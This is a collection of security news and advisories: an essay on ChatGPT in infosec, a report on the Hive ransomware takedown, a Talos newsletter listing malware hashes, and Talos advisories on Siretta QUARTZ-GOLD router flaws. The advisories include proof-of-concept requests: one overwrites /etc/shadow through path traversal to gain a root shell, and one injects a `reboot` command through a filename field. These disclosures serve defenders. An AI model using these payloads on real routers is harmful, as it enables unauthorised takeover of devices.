OpenAI's chatbot has the promise to revolutionize how security practitioners work.

ChatGPT took the world by storm after OpenAI opened it for testing on Nov. 30, 2022. For an industry calloused by years of largely unsatisfying AI and machine learning "innovations," the reactions have been quite telling. Like many who are excited by its potential, I believe this is finally the moment of clarity for how truly revolutionary AI can be for information security.

It's also quite sobering, as there are already countless examples of how it changes the game for black hats of all stripes. In one of the first proofs-of-concept, NYU professor Brendan Dolan-Gavitt used ChatGPT to exploit a buffer overflow vulnerability. Other examples include writing malware with lightning speed and crafting convincing, grammatically correct phishing emails.

The weaponization of AI within cybersecurity is not new, but what excites me the most about ChatGPT is its potential for closing information security's biggest gap: the lack of sufficient talent, in both breadth and depth of cybersecurity skills (i.e., specializations). To illustrate this further, here are three ways ChatGPT will change infosec in 2023.

**Advancing Crowdsourced Threat Intelligence**

For quite some time, one of the industry's holy grails has been successfully crowdsourcing threat intelligence. The promise stems from the ability to see what's happening across a wide swath of companies within a single vertical industry. Unfortunately, the greatest impediment has been the lack of trust between organizations to share the intelligence.

This is the problem that the array of ISACs across industries have been trying to solve — with mixed results. Going forward, an information sharing and analysis center (ISAC) could take an iteration of the ChatGPT model with its natural language interface and feed it log data submitted by ISAC constituents, based on implicit trust within the group. The ISAC could then use ChatGPT to correlate network connections, categories of malicious IP addresses and domains, and similar behaviors. The results could produce a set of IDS rules that the ISAC constituents should implement to protect themselves from threats. The ISAC also would gain insight into the overall risk posture of the industry it represents.

**Doing More With Existing Resources**

The uncertain economy is putting pressure on security organizations to implement hiring freezes to squeeze more productivity out of existing resources. ChatGPT can be extremely beneficial here as a force multiplier that enables one analyst to do the job of multiple people.

Generalists and entry-level staff can describe what they are seeing in alerts and detections, and then ask ChatGPT to decipher their observations to jumpstart the triage process. A specific example is helping with practitioners' daily de-obfuscation of suspected malicious code, which typically takes an hour or more. It now can be performed in seconds.

ChatGPT also has the potential to transform incident response. A team can use the existing model and natural language processing to feed all available data about an incident and describe the rationale for a potential response. ChatGPT could then immediately prove or disprove a theory about a compromise. Today, that involves several days of work by an incident response lead, an engineer, and several analysts to fully resolve an incident. I can foresee a future where the process doesn't need an analyst at all.

**Taking the Malware Cat-and-Mouse Game to a New Level**

Today, adversaries generate 100 million new malware samples per year. Because they all require manual coding, it is still a finite, manageable amount for signature detection. With ChatGPT, however, a hacker can say, "Here's what I'm trying to do, and here's the OS I'm trying to do it on," and it can generate hundreds of thousands of iterations of one piece of malware.

This will mean that the detection engines' ML models must be recomputed faster. It's far more complicated, because they're working against a much larger data set. Fortunately, ChatGPT will supercharge the reverse-engineering process and give anti-malware efforts a fighting chance.

For instance, a significant reverse engineering challenge is working with a generic file name, which doesn't provide necessary context about where it was found. This requires much more manual work to identify the system for which it was built. There are minor changes in binary assembly that have marked changes on the end result — e.g., was it written for a 32-bit or 64-bit architecture? Is the system using Little Endian or Big Endian? The answers determine the direction in which you read the machine language (forward or backward).

All these efforts require trial and error if you have no context. ChatGPT can run through these iterations at blazing speed and give reverse engineers the final assembly language and process it from there. They can take it further and have ChatGPT tell them what it thinks the application is doing — in natural language. More importantly, ChatGPT could do all of this at scale, analyzing hundreds of thousands of binary samples and proving insights to an analyst.

It also can help fight back against common cat-and-mouse techniques. For example, malware often contains anti-reverse engineering techniques, such as nested loops, to make it much harder for reverse engineers to keep track of what is happening and the end state. ChatGPT can figure that out much faster than humans. It also can analyze the genetic code of the malware and see where there may be code reuse to identify the fingerprint of the author more quickly.

**Long-Term Implications**

Whenever new advances in AI come to fore, there is the inevitable concern about whether it will replace humans and their jobs. I don't believe ChatGPT will make this happen, but it will make us more powerful consumers of information. The force multiplier effect will be profound at all levels. I can see CISOs feeding it a set of information about its risk register for it to return policies and procedures, incident response plans, and more — all tailored to their environments.

While ChatGPT is only a research preview, I share the excitement of my industry colleagues about its promise to revolutionize how security practitioners work.

3 Ways ChatGPT Will Change Infosec in 2023

By Waqas
The FBI and Europol have obtained decryption keys for the Hive ransomware, which they have already shared with victims.
This is a post from HackRead.com Read the original post: Hive Ransomware Gang Disrupted; Servers and Dark Web Site Seized

The Hive ransomware is known for targeting schools, hospitals, and critical infrastructure in the EU and the US.

The international law enforcement community has scored a significant victory against cybercrime with the disruption of a Hive ransomware gang and the seizure of their **dark web** website called The Hive Leak site. For your information, Hive used the website to announce new hacks and leaks.

Acting on intelligence gathered from multiple sources, the FBI, Europol, German, Dutch and other agencies also managed to seize Hive’s servers disrupting Hive’s ability to attack and extort victims.

It is worth mentioning that authorities have also obtained and shared decryption keys with the victims of the Hive ransomware, preventing them from paying a ransom of $130 million.

In the Department of Justice (DoJ) **press release**, FBI Director Christopher Wray said that “The coordinated disruption of Hive’s computer networks, following months of decrypting victims around the world, shows what we can accomplish by combining a relentless search for useful technical information to share with victims with investigation aimed at developing operations that hit our adversaries hard.”

“The FBI will continue to leverage our intelligence and law enforcement tools, global presence, and partnerships to counter cybercriminals who target American businesses and organizations,” added Director Wray.

At the time of writing, the official website of the Hive Ransomware gang displayed the following message in English and Russian:

“The Federal Bureau of Investigation seized this site as part of a coordinated law enforcement action taken against Hive Ransomware.”

Hive ransomware gang’s dark web domain right now (Image: Hackread.com

The Hive ransomware gang is alleged to have been responsible for numerous successful attacks on organizations located around the world. Some of its targets included school districts, large IT and oil multinationals, financial firms, critical government and private infrastructure and hospitals.

The ransomware gang has made over $100 million in ransom from more than 1,500 victims since June 2021. In one of its attacks, the targeted hospital was forced to shut down its operation and move to analogue methods. The ransomware attack also impacted the hospital’s capability to treat existing and new patients.

**Hive’s Modus Operandi: RaaS**

The modus operandi of the Hive ransomware gang involved using Ransomware-as-a-Service (**RaaS**), a type of cybercrime in which a hacker creates and distributes ransomware, and then rents it out to other individuals or groups who use it to carry out attacks and demands payment from victims.

RaaS allows individuals or groups with little or no technical knowledge to carry out ransomware attacks, making it a growing threat in the cyber security landscape.

Like other ransomware gangs, Hive stole data from targeted networks, lock the company out of their system and demanded ransom. The victim company would be given decryption keys to unlock its network but in case the gang’s demands were not met; it would leak the stolen data on its dark web domain.

If the ransom was paid, the affiliates and administrators split the ransom 80/20, a mechanism which is known in the cybercrime community as a “double-extortion model.”

In a conversation with Hackread.com, Duncan Greatwood, CEO of **Xage Security** said that “Critical infrastructure attacks result in widespread impacts, draw international attention and increase the success of a ransomware payout. Every second of downtime at energy, utilities, hospitals and other critical infrastructure around the world can leave communities stranded and even cost lives, forcing parties to respond quickly.”

“Today’s announcement is a win for the DOJ and I applaud their efforts but we also need to be realistic. Adversaries are smart and this win is bound to be short-lived. If we don’t shift our mindset and find ways to not only stop them but also prevent them from getting in the first place, we’ll continue to see these attacks succeed,” Duncan warned.

He suggested that “It’s paramount that critical infrastructure operators embrace the latest technology and security measures to go beyond just detecting and reacting to these attacks and instead prevent them by blocking them at the source.”

This latest action will go a long way towards reducing cybercrime activity in affected regions and should serve as a warning to other criminal groups considering similar activities.

1.  DoubleVPN used by ransomware gangs seized
2.  DarkSide ransomware quits after Bitcoin, servers are seized
3.  NetWalker ransomware disrupted – Crypto and domain seized
4.  Cl0p ransomware group members arrested, infrastructure seized
5.  Police Tricked Deadbolt Ransomware Into Sharing Decryption Keys

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Hive Ransomware Gang Disrupted; Servers and Dark Web Site Seized

Knowing what Talos IR is responding to this quarter gives you a direct view into what needs to be most secured and most analyzed to ensure your own environment remains secure.

Thursday, January 26, 2023 18:01

Welcome to this week’s edition of the Threat Source newsletter.

What’s old is new again and what's old is still old. The fact that we are seeing a comeback of this USB thumb drive nonsense is giving me heartburn, and a headache, and my left eye is twitching …  and maybe numbness in my legs? Yes, I am getting old but I’m also just tired - not from age but from the unrelenting cycle of what’s old is new again. All simply because we can’t seem to learn from our own past. Please don’t put a random USB into any of your devices and for the last time GET OFF MY LAWN.

**The one big thing**

Cisco Talos IR posted their Incident Response Trends in Q4 2022. Ransomware continued to be a top threat Talos IR responded to this quarter, with appearances from both previously seen and newly observed ransomware families. However, Talos IR also observed a significant number of cases in which post-exploitation activities occurred where the actor’s motivation could not be determined. For example, phishing campaigns, our top initial-access vector this quarter, were equally as common and featured a variety of post-exploitation activities, including command execution to perform credential harvesting, red-teaming framework deployment and remote access tooling installation.

**Why do I care?**

Knowing what Talos IR is responding to this quarter gives you a direct view into what needs to be most secured and most analyzed to ensure your own environment remains secure.

**So now what?**

In all of Talos IR’s ransomware engagements that closed out this quarter, PsExec was used to facilitate lateral movement or execute the final ransomware executable. Talos IR recommends that organizations disable PsExec, as well as access to administrative shares, to limit lateral movement. Additionally, organizations should consider use of Microsoft AppLocker to block tools and files that have been consistently leveraged by adversaries. This helps to create another layer of enforcement for any known malicious or often-misused files.

**Top security headlines of the week**

CISA and the NSA released a joint advisory on January 25th detailing the use of legitimate remote monitoring and management software (RMM) for nefarious purposes. The joint advisory detailed attacks and warned the cybersecurity community about the malicious use of commercial RMM software, offering mitigations and indicators of compromise to watch out for.

Initial Access Broker market is booming, posing growing threat to enterprises. Research shows a sharp year-over-year growth in the number of IABs operating in underground forums and markets. For ransomware operators and other cybercriminals that are looking for quick access to enterprise networks, these brokers are the answer. (Dark Reading and GroupIB)

**Can’t get enough Talos?**

*   https://blog.talosintelligence.com/quarterly-report-incident-response-trends-in-q4-2022/
*   https://blog.talosintelligence.com/threat-landscape-topic-summary-report-cisco-talos-year-in-review-2022/
*   https://talosintelligence.com/podcasts/shows/beers\_with\_talos
*   https://talostakes.talosintelligence.com/2018149/12016411-year-in-review-apt-summary-edition

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)  
Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)  
Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256:  
125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

SHA 256:  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

What Old is New Again and What's Old is Me?

Improper input validation in driver adgnetworkwfpdrv.sys in Adguard For Windows x86 up to version 7.11 allows attacker to gain local privileges escalation.

CVE-2022-45770: Versions history | AdGuard

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

The endpoint upload.cgi permits to upload a file. Following one of the functions responsible for this API:

    void input_upload.cgi(char *path,int len,char *boundary)
    
    {
      [...]   
      remaining_length_to_write = len;
      storage_udisk = nvram_get_int("storage_udisk");
      [... calculate base_folder and perform basic checks...]
      else {
        [...]
        filename_param = (char *)webcgi_safeget("filename");                                                        [1]
        filename = "";
        if (filename_param != (char *)0x0) {
          filename = filename_param;
        }
        sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
        fd = fopen(buff,"w");                                                                                       [3]
        if (fd == (FILE *)0x0) {
          base_folder = "Unable to start pipe for mtd write";
        }
        else {
          [...]
          boundary_len = strlen(boundary);
          remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
          while (0 < (int)remaining_length_to_write) {
            n_bytes_to_read = remaining_length_to_write;
            [...]
            n_bytes_read = web_read(buff,n_bytes_to_read);
            [...]
            remaining_length_to_write = remaining_length_to_write - n_bytes_read;
            bytes_written = safe_fwrite(buff,1,n_bytes_read,fd);                                                    [4]
            [...]
    }
    

This function will fetch the specified filename, at [1], and then it will use it to compose the file-path at [2]. The compose file-path is used at [3] to create/overwrite the file, and then the uploaded file will be used for the content of the just-created/overwritten file at [4]. Because from [1] up to [2] no sanitization is performed against the filename parameter, this function is vulnerable to a path traversal vulnerability. This can lead to overwriting an arbitrary file in the file-system and can lead to arbitrary command execution.

**Exploit Proof of Concept**

Sending a request like the following:

    POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
    Authorization: Basic <a valid basic auth value>
    Content-Length: 286
    Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884
    
    --906881afb7fae201f7f9962a229f9884
    Content-Disposition: form-data; name="content"; filename="content"
    
    root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
    admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
    nobody:*:0:0:99999:7:0:0:
    --906881afb7fae201f7f9962a229f9884--
    

If the request was successful, it is now possible to access the device using root:admin as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:

    ❯ telnet 192.168.0.1 2323
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.
    QUARTZ-GOLD login: root
    Password: 
    
    root@QUARTZ-GOLD:/tmp/home/root#
    

Effectively allowing arbitrary command execution.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-39045: TALOS-2022-1611 || Cisco Talos Intelligence Group

A heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the m2m DELETE\_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD offers a feature called M2M. When enabled, the device will execute the m2m binary and offer different network services. One of the services the m2m binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.

Following is the portion of m2m binary that manages the DELETE_FILE command:

    [...]
    cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;
    if (cmdid_provided == 0x15) {
      syslog(5,"M2M Command(%02x) DELETE_FILE!!!",0x15);
      m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;
      m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;
      [... set base_folder variable ...]
      base_folder_length = strlen(base_folder);
      for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);
          current_entry_off = current_entry_off + __bswap_16(previous_data_len)){
        current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));
        if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||
            (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||
            (command_string = calloc(current_data_len + base_folder_length + 0xc,1),
            command_string == 0x0)) {                                                                               [1]
          [... invalid state ...]
        }
        sprintf(command_string,"rm -rf %s/%s &",base_folder,&UDP_data_buff.entries[0].data + current_entry_off
               );                                                                                                   [2]
        syslog(6,"Deleting file :%s",command_string + 7);
        system(command_string);
        free(command_string);
        previous_data_len = *(UDP_data_buff.entries[0].data_len + current_entry_off);                               [3]
        [...]
    

Following whe will briefly explain the packet composition for this command:

    struct M2M_data_entry{
            uint16_t fix_word;
            uint16_t data_len;
            char data[];
    };
    
    struct M2M_packet{
            uint16_t packet_len;
            uint16_t cmd_id;
            uint32_t pkd_id;
            uint16_t version;
            M2M_data_entry entries[];
    };
    

The UDP packet received, which can contain at most 0x251c bytes, is casted to an M2M_packet. This is a variable length structure. Indeed, inside of it there is an array of M2M_data_entry structure that is a variable length struct. To seek the various entries the variable current_entry_off is used. It starts with value 0 and then, at [4], the value M2M_data_entry.data_len of the just-parsed entry is added to seek, in the next loop, the next entry.

The DELETE_FILE command will execute the command rm -rf <base_folder>/<M2M_data_entry.data> & for each entry in the UDP M2M_packet packet it received.

At [1] several checks are performed. One related to the entry size is particular interesting: (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) where actual_data_len_recv is the total size of the UDP packet that the service received, and current_data_len is the current data entry length. Basically, this checks if the total size of the received packet minus the header (0x22 bytes) minus the current_entry_off is lower than the current_data_len. If true, the packet is invalid; otherwise a string is allocated.

The string is allocated as follow: calloc(current_data_len + base_folder_length + 0xc,1). It takes into account the base_folder length, the M2M_data_entry.data_len length of the current entry and the other characters in the format string.

The execution will reach [2] and compose the command that will then be executed. The problem is that the allocation takes into account the size provided, but then the composition of the string will use the string until the first null byte. So if the provided size is lower than the actual M2M_data_entry.data string size, a heap-based buffer overflow would occur.

**Crash Information**

    ──── registers ────
    $r0  : 0x00093ff8  →  0x41414141 ("AAAA"?)
    $r1  : 0x7ee94168  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    $r2  : 0x14d
    $r3  : 0x41414141 ("AAAA"?)
    $r4  : 0x41414141 ("AAAA"?)
    $r5  : 0x41414141 ("AAAA"?)
    $r6  : 0x7ee932b2  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    $r7  : 0x1000
    $r8  : 0x0
    $r9  : 0x7ee931c8  →  0x7e0000d0
    $r10 : 0xd
    $r11 : 0x0
    $r12 : 0x41414141 ("AAAA"?)
    $sp  : 0x7ee93018  →  0x7ee931c8  →  0x7e0000d0
    $lr  : 0x41414141 ("AAAA"?)
    $pc  : 0x2acb5bfc  →   stmia r0!,  {r3,  r4,  r5,  r12}
    $cpsr: [negative zero CARRY overflow interrupt fast thumb]
    ──── stack ────
    0x7ee93018│+0x0000: 0x7ee931c8  →  0x7e0000d0    ← $sp
    0x7ee9301c│+0x0004: 0x00001000
    0x7ee93020│+0x0008: 0x00093155  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    0x7ee93024│+0x000c: 0x2acaf35c  →  <__stdio_fwrite+72> ldr r3,  [r4,  #16]
    0x7ee93028│+0x0010: 0x00001000
    0x7ee9302c│+0x0014: 0x0000000b
    0x7ee93030│+0x0018: 0x7ee932b2  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
    0x7ee93034│+0x001c: 0x00000000
    ──── code:arm:ARM ────
       0x2acb5bf0                  orr    r5,  r5,  r12,  lsl #24
       0x2acb5bf4                  lsr    r12,  r12,  #8
       0x2acb5bf8                  orr    r12,  r12,  lr,  lsl #24
     → 0x2acb5bfc                  stmia  r0!,  {r3,  r4,  r5,  r12}
       0x2acb5c00                  subs   r2,  r2,  #16
       0x2acb5c04                  bge    0x2acb5bd8
       0x2acb5c08                  pop    {r4,  r5}
       0x2acb5c0c                  adds   r2,  r2,  #12
       0x2acb5c10                  blt    0x2acb5c2c
    ──── threads ────
    [#0] Id 1, Name: "m2m", stopped 0x2acb5bfc in ?? (), reason: SIGSEGV
    ──── trace ────
    [#0] 0x2acb5bfc → stmia r0!,  {r3,  r4,  r5,  r12}
    

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-41991: TALOS-2022-1639 || Cisco Talos Intelligence Group

An os command injection vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

An os command injection vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to delete a previously uploaded file:

    void delfile.cgi(void)
    
    {
      [...]
    
      [... calculate the value of the base_folder variable ...]
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename_ = "";
      if (_filename_param != (char *)0x0) {
        filename_ = _filename_param;
      }
      if (*filename_ != '\0') {
        sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_);                                                 [2]
        system(command_buff);                                                                                       [3]
      }
      [...]
    }
    

The delfile.cgi expects one parameter called _filename that represents the filename of the desired file to be deleted. At [1] the uploaded parameter is taken and then used at [2] for composing the command rm -rf <base_folder>/<_filename>. The composed string is then used at [3] as argument of the system function. The _filename is not sanitized and will be used in the system function, which can lead to an OS command injection.

**Exploit Proof of Concept**

Sending a request like the following:

    POST /delfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth value>
    Content-Length: 48
    
    _filename=`reboot`f&_http_id=<the correct tid>
    

will cause the device to reboot.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-40969: TALOS-2022-1607 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the m2m DELETE\_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many other

The QUARTZ-GOLD offers a feature called M2M. When enabled, the device will execute the m2m binary and offer different network services. One of the services the m2m binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.

Following the portion of m2m binary that manages the DELETE_FILE command:

    [...]
    cmdid_provided_LB = UDP_data_buff.cmd_id >> 8;
    if (cmdid_provided == 0x15) {
      syslog(5,"M2M Command(%02x) DELETE_FILE!!!",0x15);
      m2m_UDP_packet_resp.cmd_id._0_1_ = 0x80;
      m2m_UDP_packet_resp.cmd_id._1_1_ = cmdid_provided_LB;
      [... set base_folder variable ...]
      base_folder_length = strlen(base_folder);
      for (current_entry_off = 0; current_entry_off < (actual_data_len_recv - 0x22);
          current_entry_off = current_entry_off + __bswap_16(previous_data_len)){
        current_data_len = __bswap_16(*(UDP_data_buff.entries[0].data_len + current_entry_off));
        if ((( __bswap_16(*(UDP_data_buff.fix_word + data_idx)) != 0x12)) ||
            (((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len) ||
            (command_string = calloc(current_data_len + base_folder_length + 0xc,1),
            command_string == 0x0)) {                                                                               [1]
          [... invalid state ...]
        }
        sprintf(command_string,"rm -rf %s/%s &",base_folder,&UDP_data_buff.entries[0].data + current_entry_off
               );                                                                                                   [2]
        syslog(6,"Deleting file :%s",command_string + 7);
        system(command_string);                                                                                     [3]
        free(command_string);
        previous_data_len = *(UDP_data_buff.entries[0].data_len + current_entry_off);                               [4]
        [...]
    

Following, we will briefly explain the packet composition for this command:

    struct M2M_data_entry{
            uint16_t fix_word;
            uint16_t data_len;
            char data[];
    };
    
    struct M2M_packet{
            uint16_t packet_len;
            uint16_t cmd_id;
            uint32_t pkd_id;
            uint16_t version;
            M2M_data_entry entries[];
    };
    

The UDP packet received, which can contain at most 0x251c bytes, is cast to an M2M_packet. This is a variable length structure. Indeed, inside of it there is an array of M2M_data_entry structure that is a variable length struct. To seek the various entries, the variable current_entry_off is used. It starts with value 0 and then, at [4], the value M2M_data_entry.data_len of the just-parsed entry is added to seek, in the next loop, the next entry.

The DELETE_FILE command will execute the command rm -rf <base_folder>/<M2M_data_entry.data> & for each entry in the UDP M2M_packet packet it received.

At [2] the rm -rf <base_folder>/<M2M_data_entry.data> & string is composed and executed at [3] through the system function. At [1] some checks are performed, but none about the content of the M2M_data_entry.data. Because any value of M2M_data_entry.data is allowed to reach the system function call, this function is vulnerable to an OS command injection.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-40222: TALOS-2022-1638 || Cisco Talos Intelligence Group

A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to download a previously uploaded file:

    void downfile.cgi(void)
    
    {
      [...]
    
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename = "";
      if (_filename_param != (char *)0x0) {
        filename = _filename_param;
      }
      [... calculate base_folder ...]
      if (*filename != '\0') {
        sprintf(buff,"Content-Disposition:attachment;filename=\"%s\"",(char)filename);
        send_header(200,buff,"application/tomato-binary-file",0);
        sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
        do_file(buff);                                                                                              [3]
      }
      return;
    }
    

